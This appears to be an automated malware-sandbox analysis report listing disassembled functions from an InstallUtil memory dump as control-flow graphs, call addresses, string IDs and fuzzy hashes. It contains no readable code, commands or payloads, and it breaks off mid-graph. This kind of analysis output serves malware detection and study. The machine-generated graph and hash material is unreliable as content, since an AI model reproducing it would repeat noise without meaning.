                                                        control_flow_graph 281 aab328-aab33b 282 aab47a-aab481 281->282 283 aab341-aab34a 281->283 284 aab350-aab354 283->284 285 aab484 283->285 286 aab36e-aab375 284->286 287 aab356 284->287 288 aab489 285->288 286->282 290 aab37b-aab388 286->290 289 aab359-aab364 287->289 292 aab48c-aab48d 288->292 289->285 291 aab36a-aab36c 289->291 290->282 296 aab38e-aab3a1 290->296 291->286 291->289 294 aab45b-aab467 292->294 295 aab48e-aab491 292->295 310 aab469 294->310 311 aab46d-aab46f 294->311 297 aab493-aab4b0 295->297 298 aab424-aab425 295->298 299 aab3a3 296->299 300 aab3a6-aab3ae 296->300 302 aab4dc 297->302 303 aab4b2-aab4ca 297->303 298->282 301 aab427-aab431 298->301 299->300 305 aab41b-aab41d 300->305 306 aab3b0-aab3b6 300->306 301->288 308 aab433-aab44b 301->308 309 aab4de-aab4e2 302->309 322 aab4cc-aab4d1 303->322 323 aab4d3-aab4d6 303->323 305->282 312 aab41f-aab421 305->312 306->305 307 aab3b8-aab3be 306->307 307->288 313 aab3c4-aab3dc 307->313 316 aab470-aab473 308->316 327 aab44d-aab453 308->327 310->288 315 aab46b 310->315 311->316 312->298 328 aab409-aab40c 313->328 329 aab3de-aab3e4 313->329 315->311 316->285 317 aab475-aab478 316->317 317->282 317->301 322->309 324 aab4d8-aab4da 323->324 325 aab4e3-aab4f9 323->325 324->302 324->303 325->292 334 aab4fb-aab520 325->334 327->288 330 aab455-aab459 327->330 328->285 333 aab40e-aab411 328->333 329->288 332 aab3ea-aab3fe 329->332 330->294 332->288 339 aab404 332->339 333->285 335 aab413-aab419 333->335 336 aab522 334->336 337 aab527-aab604 call aa3908 call aa3428 334->337 335->305 335->306 336->337 349 aab60b-aab62c call aa4dc8 337->349 350 aab606 337->350 339->328 352 aab631-aab63c 349->352 350->349 353 aab63e 352->353 354 aab643-aab647 352->354 353->354 355 aab649-aab64a 354->355 356 aab64c-aab653 354->356 357 aab66b-aab6af 355->357 358 aab65a-aab668 356->358 359 aab655 356->359 363 aab715-aab72c 357->363 358->357 359->358 365 aab72e-aab753 363->365 366 aab6b1-aab6c7 363->366 375 aab76b 365->375 376 aab755-aab76a 365->376 370 aab6c9-aab6d5 366->370 371 aab6f1 366->371 372 aab6df-aab6e5 370->372 373 aab6d7-aab6dd 370->373 374 aab6f7-aab714 371->374 377 aab6ef 372->377 373->377 374->363 379 aab76c 375->379 376->375 377->374 379->379
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 62f92259dc0fd57df16f0c7b8f0c5c61e985ffce716ca843e9cac2c399d54830
                                                        • Instruction ID: 55af82f545f563fdc51b773f7f845881f3bd025c17df656ceab3f579f121ec34
                                                        • Opcode Fuzzy Hash: 62f92259dc0fd57df16f0c7b8f0c5c61e985ffce716ca843e9cac2c399d54830
                                                        • Instruction Fuzzy Hash: 9AF10C75E14658CFDB14CFA9C994A9DBBB1FF49310F158069E819AB3A2DB309C81CF60
                                                        Function 00AABEB0 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 382 aabeb0-aabeb1 383 aabeb3-aabeb5 382->383 384 aabe44-aabe4a 382->384 385 aabe48-aabe4a 383->385 386 aabeb7-aabeb9 383->386 387 aabe4b 384->387 385->387 389 aabebb-aabee0 386->389 390 aabe4c 386->390 387->390 391 aabee2 389->391 392 aabee7-aabfc4 call aa3908 call aa3428 389->392 390->390 391->392 402 aabfcb-aabffc call aa4dc8 392->402 403 aabfc6 392->403 406 aabffe 402->406 407 aac003-aac007 402->407 403->402 406->407 408 aac009-aac00a 407->408 409 aac00c-aac013 407->409 410 aac02b-aac06f 408->410 411 aac01a-aac028 409->411 412 aac015 409->412 416 aac0d5-aac0ec 410->416 411->410 412->411 418 aac0ee-aac113 416->418 419 aac071-aac087 416->419 425 aac12b-aac182 418->425 426 aac115-aac12a 418->426 423 aac089-aac095 419->423 424 aac0b1 419->424 427 aac09f-aac0a5 423->427 428 aac097-aac09d 423->428 429 aac0b7-aac0d4 424->429 426->425 430 aac0af 427->430 428->430 429->416 430->429
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 54a5e168a88448e6bc48d17e658a12578cca6d74e09ed69da8b04fe1cc0dc611
                                                        • Instruction ID: ad8ab1ca94cdc23467ae25221d66e0432b08e156700da0758202e72238826dcf
                                                        • Opcode Fuzzy Hash: 54a5e168a88448e6bc48d17e658a12578cca6d74e09ed69da8b04fe1cc0dc611
                                                        • Instruction Fuzzy Hash: E391E374E04208CFDB54DFA9D984A9DBBF2BF89310F20D069E419AB365DB319986CF10
                                                        Function 00AAC190 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 437 aac190-aac195 438 aac128-aac129 437->438 439 aac197-aac199 437->439 441 aac12c-aac182 438->441 440 aac19b-aac1c0 439->440 439->441 442 aac1c2 440->442 443 aac1c7-aac2a4 call aa3908 call aa3428 440->443 442->443 455 aac2ab-aac2cc call aa4dc8 443->455 456 aac2a6 443->456 458 aac2d1-aac2dc 455->458 456->455 459 aac2de 458->459 460 aac2e3-aac2e7 458->460 459->460 461 aac2e9-aac2ea 460->461 462 aac2ec-aac2f3 460->462 463 aac30b-aac34f 461->463 464 aac2fa-aac308 462->464 465 aac2f5 462->465 469 aac3b5-aac3cc 463->469 464->463 465->464 471 aac3ce-aac3f3 469->471 472 aac351-aac367 469->472 479 aac40b 471->479 480 aac3f5-aac40a 471->480 476 aac369-aac375 472->476 477 aac391 472->477 481 aac37f-aac385 476->481 482 aac377-aac37d 476->482 478 aac397-aac3b4 477->478 478->469 480->479 483 aac38f 481->483 482->483 483->478
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 7362382607fafd4f05e9661185c8c94c52eb7c0a780297bcab3e38bf790da0af
                                                        • Instruction ID: 7b9db78561c07056e82e05e25dcca78d9544601824cc4af372e7ab5ff4011f44
                                                        • Opcode Fuzzy Hash: 7362382607fafd4f05e9661185c8c94c52eb7c0a780297bcab3e38bf790da0af
                                                        • Instruction Fuzzy Hash: AE91D274E04208DFEB14DFA9D984A9DBBF2BF89310F24C069E409AB265DB709985CF10
                                                        Function 00AABBD2 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 487 aabbd2-aabbd5 488 aabb68-aabb6b 487->488 489 aabbd7-aabbd9 487->489 493 aabbbd-aabbc8 488->493 491 aabbdb-aabc00 489->491 492 aabb6c-aabb6f 489->492 495 aabc02 491->495 496 aabc07-aabce4 call aa3908 call aa3428 491->496 492->493 495->496 506 aabceb-aabd0c call aa4dc8 496->506 507 aabce6 496->507 509 aabd11-aabd1c 506->509 507->506 510 aabd1e 509->510 511 aabd23-aabd27 509->511 510->511 512 aabd29-aabd2a 511->512 513 aabd2c-aabd33 511->513 514 aabd4b-aabd8f 512->514 515 aabd3a-aabd48 513->515 516 aabd35 513->516 520 aabdf5-aabe0c 514->520 515->514 516->515 522 aabe0e-aabe33 520->522 523 aabd91-aabda7 520->523 529 aabe4b 522->529 530 aabe35-aabe4a 522->530 527 aabda9-aabdb5 523->527 528 aabdd1 523->528 531 aabdbf-aabdc5 527->531 532 aabdb7-aabdbd 527->532 533 aabdd7-aabdf4 528->533 535 aabe4c 529->535 530->529 534 aabdcf 531->534 532->534 533->520 534->533 535->535
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 07c59ceea1df969d41a05a34f3542a35b338df20403e7465a9af5ff3cf2eb8f9
                                                        • Instruction ID: 6253cf2519b987ac71bd9d1a454cf0de9f33c2e8316cde986e547d3099508248
                                                        • Opcode Fuzzy Hash: 07c59ceea1df969d41a05a34f3542a35b338df20403e7465a9af5ff3cf2eb8f9
                                                        • Instruction Fuzzy Hash: 4991C474E14218CFDB14DFA9D984A9DBBF2BF89300F14D069E419AB366DB709981DF20
                                                        Function 00AAC470 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 540 aac470-aac4a0 541 aac4a2 540->541 542 aac4a7-aac584 call aa3908 call aa3428 540->542 541->542 552 aac58b-aac5ac call aa4dc8 542->552 553 aac586 542->553 555 aac5b1-aac5bc 552->555 553->552 556 aac5be 555->556 557 aac5c3-aac5c7 555->557 556->557 558 aac5c9-aac5ca 557->558 559 aac5cc-aac5d3 557->559 560 aac5eb-aac62f 558->560 561 aac5da-aac5e8 559->561 562 aac5d5 559->562 566 aac695-aac6ac 560->566 561->560 562->561 568 aac6ae-aac6d3 566->568 569 aac631-aac647 566->569 575 aac6eb 568->575 576 aac6d5-aac6ea 568->576 573 aac649-aac655 569->573 574 aac671 569->574 577 aac65f-aac665 573->577 578 aac657-aac65d 573->578 579 aac677-aac694 574->579 576->575 580 aac66f 577->580 578->580 579->566 580->579
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: dcc3553e49fd865e63e149da19a8539f2f8429d767391147911cdf934f7c9571
                                                        • Instruction ID: 64e9e8efd3bc2324fc984b3cb440a4dc570df6b45a68cf51e34a83b66fb4e842
                                                        • Opcode Fuzzy Hash: dcc3553e49fd865e63e149da19a8539f2f8429d767391147911cdf934f7c9571
                                                        • Instruction Fuzzy Hash: D281A3B4E04218CFEB14DFA9D984A9DBBF2BF89310F14D069E419AB365DB709981CF50
                                                        Function 00AACA32 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 584 aaca32-aaca60 585 aaca62 584->585 586 aaca67-aacb44 call aa3908 call aa3428 584->586 585->586 596 aacb4b-aacb6c call aa4dc8 586->596 597 aacb46 586->597 599 aacb71-aacb7c 596->599 597->596 600 aacb7e 599->600 601 aacb83-aacb87 599->601 600->601 602 aacb89-aacb8a 601->602 603 aacb8c-aacb93 601->603 604 aacbab-aacbef 602->604 605 aacb9a-aacba8 603->605 606 aacb95 603->606 610 aacc55-aacc6c 604->610 605->604 606->605 612 aacc6e-aacc93 610->612 613 aacbf1-aacc07 610->613 620 aaccab 612->620 621 aacc95-aaccaa 612->621 617 aacc09-aacc15 613->617 618 aacc31 613->618 622 aacc1f-aacc25 617->622 623 aacc17-aacc1d 617->623 619 aacc37-aacc54 618->619 619->610 621->620 624 aacc2f 622->624 623->624 624->619
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 86f509c19858d4d44b2a5f0cd0ce2cdefc9feb1516365a32f436e2f20fe4ed8c
                                                        • Instruction ID: 59bdfdca7681b6a14121ef69f6b45afbd75f051d5476ec012852f2d614b099c0
                                                        • Opcode Fuzzy Hash: 86f509c19858d4d44b2a5f0cd0ce2cdefc9feb1516365a32f436e2f20fe4ed8c
                                                        • Instruction Fuzzy Hash: 5981B474E00218CFEB14DFA9D984A9DBBF2BF89310F14C069E819AB365DB709981CF10
                                                        Function 00AAC752 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 628 aac752-aac780 629 aac782 628->629 630 aac787-aac864 call aa3908 call aa3428 628->630 629->630 640 aac86b-aac88c call aa4dc8 630->640 641 aac866 630->641 643 aac891-aac89c 640->643 641->640 644 aac89e 643->644 645 aac8a3-aac8a7 643->645 644->645 646 aac8a9-aac8aa 645->646 647 aac8ac-aac8b3 645->647 650 aac8cb-aac90f 646->650 648 aac8ba-aac8c8 647->648 649 aac8b5 647->649 648->650 649->648 654 aac975-aac98c 650->654 656 aac98e-aac9b3 654->656 657 aac911-aac927 654->657 664 aac9cb 656->664 665 aac9b5-aac9ca 656->665 661 aac929-aac935 657->661 662 aac951 657->662 666 aac93f-aac945 661->666 667 aac937-aac93d 661->667 663 aac957-aac974 662->663 663->654 665->664 668 aac94f 666->668 667->668 668->663
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 3b2fbd3890ce52eafb1dd09d875575aab6e70a2f097d50ea16c649afe82197b1
                                                        • Instruction ID: 1fdd9f2799e516e682a0aefd037a8200eb2742e31a3c228a2da0e3f551a5545e
                                                        • Opcode Fuzzy Hash: 3b2fbd3890ce52eafb1dd09d875575aab6e70a2f097d50ea16c649afe82197b1
                                                        • Instruction Fuzzy Hash: EE81C374E04218CFEB14DFAAD984A9DBBF2BF89310F14C069E419AB365DB709981CF10
                                                        Function 00AA4AD9 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 672 aa4ad9-aa4b08 673 aa4b0a 672->673 674 aa4b0f-aa4bec call aa3908 call aa3428 672->674 673->674 684 aa4bee 674->684 685 aa4bf3-aa4c11 674->685 684->685 715 aa4c14 call aa4dc8 685->715 716 aa4c14 call aa4db9 685->716 686 aa4c1a-aa4c25 687 aa4c2c-aa4c30 686->687 688 aa4c27 686->688 689 aa4c32-aa4c33 687->689 690 aa4c35-aa4c3c 687->690 688->687 691 aa4c54-aa4c98 689->691 692 aa4c3e 690->692 693 aa4c43-aa4c51 690->693 697 aa4cfe-aa4d15 691->697 692->693 693->691 699 aa4c9a-aa4cb0 697->699 700 aa4d17-aa4d3c 697->700 704 aa4cda 699->704 705 aa4cb2-aa4cbe 699->705 706 aa4d3e-aa4d53 700->706 707 aa4d54 700->707 710 aa4ce0-aa4cfd 704->710 708 aa4cc8-aa4cce 705->708 709 aa4cc0-aa4cc6 705->709 706->707 711 aa4cd8 708->711 709->711 710->697 711->710 715->686 716->686
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: a59f87a1d003375b08c98ff19f1811c9c3025bfa8171b187981c1ce26999015e
                                                        • Instruction ID: 24b59f3a3744b14a1dbd17e42e4141f26f13f0fe8bcd49f5a14993c64e7da68a
                                                        • Opcode Fuzzy Hash: a59f87a1d003375b08c98ff19f1811c9c3025bfa8171b187981c1ce26999015e
                                                        • Instruction Fuzzy Hash: 6D81B174E05218CFDB54DFA9D984A9DBBF2BF89310F24C069E819AB365DB709981CF10
                                                        Function 00AAB4F2 Relevance: 4.0, Strings: 3, Instructions: 203COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1613 aab4f2-aab4f5 1614 aab488 1613->1614 1615 aab4f7-aab4f9 1613->1615 1618 aab48a 1614->1618 1619 aab472-aab478 1614->1619 1616 aab4fb-aab520 1615->1616 1617 aab48c-aab48d 1615->1617 1620 aab522 1616->1620 1621 aab527-aab604 call aa3908 call aa3428 1616->1621 1622 aab45b-aab467 1617->1622 1623 aab48e-aab491 1617->1623 1618->1617 1624 aab47a-aab481 1619->1624 1625 aab427-aab431 1619->1625 1620->1621 1660 aab60b-aab62c call aa4dc8 1621->1660 1661 aab606 1621->1661 1636 aab469 1622->1636 1637 aab46d-aab46f 1622->1637 1628 aab493-aab4b0 1623->1628 1629 aab424-aab425 1623->1629 1626 aab489 1625->1626 1627 aab433-aab44b 1625->1627 1626->1617 1641 aab470-aab473 1627->1641 1646 aab44d-aab453 1627->1646 1630 aab4dc 1628->1630 1631 aab4b2-aab4ca 1628->1631 1629->1624 1629->1625 1634 aab4de-aab4e2 1630->1634 1651 aab4cc-aab4d1 1631->1651 1652 aab4d3-aab4d6 1631->1652 1636->1626 1640 aab46b 1636->1640 1637->1641 1640->1637 1642 aab484 1641->1642 1643 aab475-aab478 1641->1643 1642->1626 1643->1624 1643->1625 1646->1626 1650 aab455-aab459 1646->1650 1650->1622 1651->1634 1653 aab4d8-aab4da 1652->1653 1654 aab4e3-aab4f9 1652->1654 1653->1630 1653->1631 1654->1616 1654->1617 1663 aab631-aab63c 1660->1663 1661->1660 1664 aab63e 1663->1664 1665 aab643-aab647 1663->1665 1664->1665 1666 aab649-aab64a 1665->1666 1667 aab64c-aab653 1665->1667 1668 aab66b-aab6af 1666->1668 1669 aab65a-aab668 1667->1669 1670 aab655 1667->1670 1674 aab715-aab72c 1668->1674 1669->1668 1670->1669 1676 aab72e-aab753 1674->1676 1677 aab6b1-aab6c7 1674->1677 1686 aab76b 1676->1686 1687 aab755-aab76a 1676->1687 1681 aab6c9-aab6d5 1677->1681 1682 aab6f1 1677->1682 1683 aab6df-aab6e5 1681->1683 1684 aab6d7-aab6dd 1681->1684 1685 aab6f7-aab714 1682->1685 1688 aab6ef 1683->1688 1684->1688 1685->1674 1690 aab76c 1686->1690 1687->1686 1688->1685 1690->1690
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$PHsq$PHsq
                                                        • API String ID: 0-255689168
                                                        • Opcode ID: 00396d3a0fff1b475fce6c59acaa5a574da8f64f29e3986544a2010af3689714
                                                        • Instruction ID: 4efb6244e76412d74bdd0ec09683945121263eacf0b7828b8a59ee63ac1a2bec
                                                        • Opcode Fuzzy Hash: 00396d3a0fff1b475fce6c59acaa5a574da8f64f29e3986544a2010af3689714
                                                        • Instruction Fuzzy Hash: E5810975E142089FDB14DFAAD984A9DFBF2FF89310F14C069E405AB2A6DB319842CF50
                                                        Function 00AA97E8 Relevance: 3.4, Strings: 2, Instructions: 899COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$4'sq
                                                        • API String ID: 0-2651803416
                                                        • Opcode ID: 09d98bc1cb1f6f4e3117b05a85ebe1d9ad877338fc1325c682d2f8cecc593447
                                                        • Instruction ID: f8d2f78e7cc7df67cf2986934991089fc508c146a1e05683c6eb7d08e4e5ced4
                                                        • Opcode Fuzzy Hash: 09d98bc1cb1f6f4e3117b05a85ebe1d9ad877338fc1325c682d2f8cecc593447
                                                        • Instruction Fuzzy Hash: CE828071A00209DFCB15CF68C984AAEBBF2FF99310F15855AE806DB2A1D731ED91CB51
                                                        Function 00AA6108 Relevance: 3.0, Strings: 2, Instructions: 511COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$Hwq
                                                        • API String ID: 0-1668724233
                                                        • Opcode ID: 10fd2079117a3c6741231a8bfb79053ae2b89864576980e8a3049ac1dca834b4
                                                        • Instruction ID: 8fe3f36f831f734cdaa7e21f1ef2ec27cc6cb644174710f497a67ae5f53df9f4
                                                        • Opcode Fuzzy Hash: 10fd2079117a3c6741231a8bfb79053ae2b89864576980e8a3049ac1dca834b4
                                                        • Instruction Fuzzy Hash: B5128E71A002189FCB18DFA9C854BAEBBB6FF89304F248529E545DB391DB349D42CF90
                                                        Function 00AA3572 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xwq$$sq
                                                        • API String ID: 0-2558833440
                                                        • Opcode ID: 817a402074aabce5dddb8602d67b13d3885be74d5ba8858a5d0d291e5c6bc98c
                                                        • Instruction ID: 8db7686405f0cf55ee6780cef6a22bff71714435b193ddb8610f995169305c26
                                                        • Opcode Fuzzy Hash: 817a402074aabce5dddb8602d67b13d3885be74d5ba8858a5d0d291e5c6bc98c
                                                        • Instruction Fuzzy Hash: 11F16E75E042589FCF08DFB9D8955AEBBB2BF89300B14846EE406AB394CF349D06DB41
                                                        Function 00AAF007 Relevance: .7, Instructions: 720COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08a8d03bd4c83d44670e457858d7965b01e091de77a908bf504a86ac29ba65c4
                                                        • Instruction ID: 18fb97a9a06cce40f62e391b4abad211fc04864ec684c5b49a6b3fb168640f4e
                                                        • Opcode Fuzzy Hash: 08a8d03bd4c83d44670e457858d7965b01e091de77a908bf504a86ac29ba65c4
                                                        • Instruction Fuzzy Hash: 1372B174E012298FDB64DFA9C984BDDBBB2BB4A300F1491E9D409A7295DB349EC1CF50
                                                        Function 00AA87E9 Relevance: 4.3, Strings: 3, Instructions: 503COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1423 aa87e9-aa8805 1424 aa8811-aa881d 1423->1424 1425 aa8807-aa880c 1423->1425 1428 aa881f-aa8821 1424->1428 1429 aa882d-aa8832 1424->1429 1426 aa8ba6-aa8bab 1425->1426 1430 aa8829-aa882b 1428->1430 1429->1426 1430->1429 1431 aa8837-aa8843 1430->1431 1433 aa8853-aa8858 1431->1433 1434 aa8845-aa8851 1431->1434 1433->1426 1434->1433 1436 aa885d-aa8868 1434->1436 1438 aa886e-aa8879 1436->1438 1439 aa8912-aa891d 1436->1439 1444 aa887b-aa888d 1438->1444 1445 aa888f 1438->1445 1442 aa8923-aa8932 1439->1442 1443 aa89c0-aa89cc 1439->1443 1452 aa8943-aa8952 1442->1452 1453 aa8934-aa893e 1442->1453 1454 aa89ce-aa89da 1443->1454 1455 aa89dc-aa89ee 1443->1455 1446 aa8894-aa8896 1444->1446 1445->1446 1449 aa8898-aa88a7 1446->1449 1450 aa88b6-aa88bb 1446->1450 1449->1450 1461 aa88a9-aa88b4 1449->1461 1450->1426 1463 aa8976-aa897f 1452->1463 1464 aa8954-aa8960 1452->1464 1453->1426 1454->1455 1462 aa8a1c-aa8a27 1454->1462 1469 aa8a12-aa8a17 1455->1469 1470 aa89f0-aa89fc 1455->1470 1461->1450 1467 aa88c0-aa88c9 1461->1467 1473 aa8b09-aa8b14 1462->1473 1474 aa8a2d-aa8a36 1462->1474 1475 aa8981-aa8993 1463->1475 1476 aa8995 1463->1476 1477 aa896c-aa8971 1464->1477 1478 aa8962-aa8967 1464->1478 1483 aa88cb-aa88d0 1467->1483 1484 aa88d5-aa88e4 1467->1484 1469->1426 1488 aa8a08-aa8a0d 1470->1488 1489 aa89fe-aa8a03 1470->1489 1492 aa8b3e-aa8b4d 1473->1492 1493 aa8b16-aa8b20 1473->1493 1490 aa8a38-aa8a4a 1474->1490 1491 aa8a4c 1474->1491 1480 aa899a-aa899c 1475->1480 1476->1480 1477->1426 1478->1426 1480->1443 1486 aa899e-aa89aa 1480->1486 1483->1426 1501 aa8908-aa890d 1484->1501 1502 aa88e6-aa88f2 1484->1502 1503 aa89ac-aa89b1 1486->1503 1504 aa89b6-aa89bb 1486->1504 1488->1426 1489->1426 1494 aa8a51-aa8a53 1490->1494 1491->1494 1506 aa8b4f-aa8b5e 1492->1506 1507 aa8ba1 1492->1507 1509 aa8b22-aa8b2e 1493->1509 1510 aa8b37-aa8b3c 1493->1510 1499 aa8a63 1494->1499 1500 aa8a55-aa8a61 1494->1500 1508 aa8a68-aa8a6a 1499->1508 1500->1508 1501->1426 1516 aa88fe-aa8903 1502->1516 1517 aa88f4-aa88f9 1502->1517 1503->1426 1504->1426 1506->1507 1521 aa8b60-aa8b78 1506->1521 1507->1426 1513 aa8a6c-aa8a71 1508->1513 1514 aa8a76-aa8a89 1508->1514 1509->1510 1520 aa8b30-aa8b35 1509->1520 1510->1426 1513->1426 1522 aa8a8b 1514->1522 1523 aa8ac1-aa8acb 1514->1523 1516->1426 1517->1426 1520->1426 1535 aa8b9a-aa8b9f 1521->1535 1536 aa8b7a-aa8b98 1521->1536 1524 aa8a8e-aa8a9f call aa8258 1522->1524 1529 aa8aea-aa8af6 1523->1529 1530 aa8acd-aa8ad9 call aa8258 1523->1530 1532 aa8aa1-aa8aa4 1524->1532 1533 aa8aa6-aa8aab 1524->1533 1540 aa8af8-aa8afd 1529->1540 1541 aa8aff 1529->1541 1544 aa8adb-aa8ade 1530->1544 1545 aa8ae0-aa8ae5 1530->1545 1532->1533 1538 aa8ab0-aa8ab3 1532->1538 1533->1426 1535->1426 1536->1426 1542 aa8ab9-aa8abf 1538->1542 1543 aa8bac-aa8bd4 1538->1543 1547 aa8b04 1540->1547 1541->1547 1542->1523 1542->1524 1550 aa8be0-aa8beb 1543->1550 1551 aa8bd6-aa8bdb 1543->1551 1544->1529 1544->1545 1545->1426 1547->1426 1555 aa8c93-aa8c9c 1550->1555 1556 aa8bf1-aa8bfc 1550->1556 1553 aa8d61-aa8d65 1551->1553 1561 aa8c9e-aa8ca9 1555->1561 1562 aa8ce7-aa8cf2 1555->1562 1559 aa8bfe-aa8c10 1556->1559 1560 aa8c12 1556->1560 1563 aa8c17-aa8c19 1559->1563 1560->1563 1571 aa8d5f 1561->1571 1572 aa8caf-aa8cc1 1561->1572 1569 aa8d08 1562->1569 1570 aa8cf4-aa8d06 1562->1570 1565 aa8c1b-aa8c2a 1563->1565 1566 aa8c4e-aa8c60 1563->1566 1565->1566 1578 aa8c2c-aa8c42 1565->1578 1566->1571 1577 aa8c66-aa8c74 1566->1577 1575 aa8d0d-aa8d0f 1569->1575 1570->1575 1571->1553 1572->1571 1581 aa8cc7-aa8ccb 1572->1581 1575->1571 1580 